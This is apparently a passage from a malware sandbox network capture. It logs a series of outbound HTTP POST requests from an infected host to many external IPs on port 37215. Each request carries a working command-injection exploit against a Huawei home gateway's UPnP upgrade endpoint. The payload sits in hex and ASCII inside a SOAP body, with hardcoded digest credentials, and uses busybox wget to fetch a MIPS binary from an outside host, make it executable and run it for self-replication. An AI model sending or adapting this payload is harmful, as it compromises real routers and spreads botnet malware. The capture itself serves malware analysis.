                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  613192.168.2.1342428157.47.77.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335028887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  614192.168.2.1342540197.158.61.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335072041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  615192.168.2.1357518144.113.135.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335117102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  616192.168.2.1353770157.6.93.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335140944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  617192.168.2.1337052157.144.104.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335339069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  618192.168.2.133775441.20.188.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335361958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  619192.168.2.133352091.133.131.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335378885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  620192.168.2.133451841.209.133.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335408926 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  621192.168.2.1359694157.210.231.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335427999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  622192.168.2.1340628157.200.10.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335453033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 